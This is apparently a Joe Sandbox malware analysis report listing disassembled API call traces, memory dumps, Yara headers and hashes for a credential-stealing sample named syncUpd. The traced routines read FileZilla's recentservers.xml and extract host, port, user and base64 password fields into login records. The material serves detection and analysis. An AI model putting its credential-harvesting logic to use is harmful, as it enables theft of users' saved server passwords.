                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EBA9
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 0040EBC5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EBD3
                                                                                                                                                                                                                                                                • Part of subcall function 00414FA0: malloc.MSVCRT ref: 00414FA8
                                                                                                                                                                                                                                                                • Part of subcall function 00414FA0: strncpy.MSVCRT ref: 00414FC3
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 0040EC0F
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC1D
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<User>), ref: 0040EC59
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040EC67
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0040ECA3
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000), ref: 0040ECB5
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040ED42
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED5A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED72
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,00000000), ref: 0040ED8A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 0040EDA2
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,profile: null), ref: 0040EDB1
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,url: ), ref: 0040EDC0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDD3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD34), ref: 0040EDE2
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EDF5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD38), ref: 0040EE04
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,login: ), ref: 0040EE13
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE26
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD44), ref: 0040EE35
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,password: ), ref: 0040EE44
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040EE57
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD54), ref: 0040EE66
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD58), ref: 0040EE75
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 0040EEB9
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 0040EECE
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040EF17
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                                                                                                                                                                                                                                              • API String ID: 337689325-555421843
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A00), ref: 00906178
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624DA4), ref: 00906191
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624E10), ref: 009061A9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A60), ref: 009061C1
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A4C), ref: 009061DA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624AEC), ref: 009061F2
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624CB8), ref: 0090620A
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624B30), ref: 00906223
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624D84), ref: 0090623B
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624D28), ref: 00906253
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624BAC), ref: 0090626C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624AE0), ref: 00906284
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624DD8), ref: 0090629C
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,006248B0), ref: 009062B5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624D7C), ref: 009062CD
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624A20), ref: 009062E5
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624C08), ref: 009062FE
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624E00), ref: 00906316
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,006248BC), ref: 0090632E
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624928), ref: 00906347
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00625074,00624AAC), ref: 0090635F
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624D30,?,00903927), ref: 00906371
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624978,?,00903927), ref: 00906382
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624900,?,00903927), ref: 00906394
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(006249D8,?,00903927), ref: 009063A6
                                                                                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00624B1C,?,00903927), ref: 009063B7
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624E98,00624C94), ref: 009063D9
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624FB8,00624C14), ref: 009063FA
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624FB8,006249C8), ref: 00906412
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(006250A8,00624B88), ref: 00906434
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624F6C,00624924), ref: 00906455
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624F9C,00624C04), ref: 00906476
                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00624F9C,0041D12C), ref: 0090648D
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2238633743-0
                                                                                                                                                                                                                                                              • Opcode ID: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                              • Instruction ID: d4aa2cfe4fe3deba262eae2cdb7e029af101058de839555c34d9f5383f1d1ee9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bf4faa6d80337b6a8c58e308678245154ae8b5c2676724c8d6fcdc68551e2bc
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0A140B5910E10AFC374DFA8FE88A1637BBBBCC3117116519A60AC72A0DF759482CF95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                                • Part of subcall function 00905747: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00905772
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcpy.KERNEL32(00000000,?), ref: 009071D9
                                                                                                                                                                                                                                                                • Part of subcall function 00907187: lstrcat.KERNEL32(00000000), ref: 009071E9
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907007: lstrcpy.KERNEL32(?,00000000), ref: 0090704D
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 008F9633
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: GetFileSizeEx.KERNEL32(000000FF,?), ref: 008F9658
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalAlloc.KERNEL32(00000040,?), ref: 008F9678
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: ReadFile.KERNEL32(000000FF,?,00000000,008F16B6,00000000), ref: 008F96A1
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: LocalFree.KERNEL32(008F16B6), ref: 008F96D7
                                                                                                                                                                                                                                                                • Part of subcall function 008F9607: CloseHandle.KERNEL32(000000FF), ref: 008F96E1
                                                                                                                                                                                                                                                                • Part of subcall function 00905797: LocalAlloc.KERNEL32(00000040,-00000001), ref: 009057B9
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 008FEDC2
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,000F423F,0041D77A,0041D777,0041D776,0041D773), ref: 008FEE09
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008FEE10
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCD4), ref: 008FEE2C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEE3A
                                                                                                                                                                                                                                                                • Part of subcall function 00905207: malloc.MSVCRT ref: 0090520F
                                                                                                                                                                                                                                                                • Part of subcall function 00905207: strncpy.MSVCRT ref: 0090522A
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCDC), ref: 008FEE76
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEE84
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCE4), ref: 008FEEC0
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEECE
                                                                                                                                                                                                                                                              • StrStrA.SHLWAPI(00000000,0041DCEC), ref: 008FEF0A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEF1C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFA9
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFC1
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFD9
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FEFF1
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD08), ref: 008FF009
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD1C), ref: 008FF018
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD2C), ref: 008FF027
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF03A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD34), ref: 008FF049
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF05C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD38), ref: 008FF06B
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD3C), ref: 008FF07A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF08D
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD44), ref: 008FF09C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD48), ref: 008FF0AB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FF0BE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD54), ref: 008FF0CD
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DD58), ref: 008FF0DC
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 008FF120
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0041D772), ref: 008FF135
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FF17E
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 3689735781-0
                                                                                                                                                                                                                                                              • Opcode ID: b16d59508813708b1d92d6ee10662e8f39c45857b8dfa9bcd2ae4a529fc321c5
                                                                                                                                                                                                                                                              • Instruction ID: 8d27217e2b0c6f8bb8f6fb7fc6de085cb1105cc346dc99679b097b13fb9ed01e
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b16d59508813708b1d92d6ee10662e8f39c45857b8dfa9bcd2ae4a529fc321c5
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 35D14EB1D04208AFCB14EBF4DD9AEEEB739AF94710F504519F202A61D1DF74AA45CBA0
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040A369
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A510
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A532
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A554
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA94), ref: 0040A563
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                                                                                                                                                                                • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A605
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040A614
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040A65D
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040A689
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2757736487.0000000000400000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000431000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000435000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000439000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000444000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              • Associated: 0000000F.00000002.2757736487.0000000000636000.00000040.00000001.01000000.0000000D.sdmp
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpylstrlen$AllocFileHeapmemset$CopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 1525483061-0
                                                                                                                                                                                                                                                              • Opcode ID: 6d247f341b7f3546061285bcf01454fcb19e159dab04dbae6386322d3ae48b79
                                                                                                                                                                                                                                                              • Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6d247f341b7f3546061285bcf01454fcb19e159dab04dbae6386322d3ae48b79
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 009072D7: StrCmpCA.SHLWAPI(DKb,008FA2AE,?,008FA2AE,00624B44), ref: 009072F6
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 008FA5C9
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 008FA5D0
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 008FA3B1
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrlen.KERNEL32(008F4E2C,?,?,008F4E2C,0041D79A), ref: 00907092
                                                                                                                                                                                                                                                                • Part of subcall function 00907087: lstrcpy.KERNEL32(0041D79A,00000000), ref: 009070EC
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrlen.KERNEL32(?,006249EC,?,004215A4,0041D7D6), ref: 0090722C
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcpy.KERNEL32(00000000), ref: 0090726B
                                                                                                                                                                                                                                                                • Part of subcall function 00907217: lstrcat.KERNEL32(00000000,00000000), ref: 00907279
                                                                                                                                                                                                                                                                • Part of subcall function 00907107: lstrcpy.KERNEL32(?,0041D7D6), ref: 0090716C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA711
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA80), ref: 008FA720
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA733
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA84), ref: 008FA742
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA755
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA88), ref: 008FA764
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA777
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA8C), ref: 008FA786
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA799
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA90), ref: 008FA7A8
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA7BB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA94), ref: 008FA7CA
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memcmp.MSVCRT ref: 008F9A72
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: memset.MSVCRT ref: 008F9AA5
                                                                                                                                                                                                                                                                • Part of subcall function 008F9A57: LocalAlloc.KERNEL32(00000040,?), ref: 008F9AF5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 008FA813
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DA98), ref: 008FA82D
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FA86C
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 008FA87B
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 008FA8C4
                                                                                                                                                                                                                                                                • Part of subcall function 00906FA7: lstrcpy.KERNEL32(0041D7D6,00000000), ref: 00906FEF
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 008FA8F0
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 0000000F.00000002.2758122594.00000000008F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 008F0000, based on PE: false
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_15_2_8f0000_syncUpd.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                              • API String ID: 2228671196-0
                                                                                                                                                                                                                                                              • Opcode ID: 9e42199074a90107a8dead1a7d243c1108800441b4ba894103f5affc1eeccc27
                                                                                                                                                                                                                                                              • Instruction ID: c231d8460975d3f41a2a66522177e5a8274474f1da98cf751b93661d9b6729d9
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9e42199074a90107a8dead1a7d243c1108800441b4ba894103f5affc1eeccc27
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4D022AB2904108AFCB18EBE0DD96EEEB339BF94711F104159F646A61D1DF34AE05CBA1
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                                                                                                                                                                                • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                                                                                                                                                                                • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                                                                                                                                                                                • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,0095FF10,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                                                                                                                                                                                • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                                                                                                                                                                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
                                                                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 0040C81E
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C958
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C97A
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C99C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA02
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,00000000), ref: 0040CA24
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,0095C850,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                                                                                                                                                                                • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA7A
                                                                                                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 0040CA89
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040CAD2
                                                                                                                                                                                                                                                                • Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F
                                                                                                                                                                                                                                                              • DeleteFileA.KERNEL32(00000000), ref: 0040CAFE
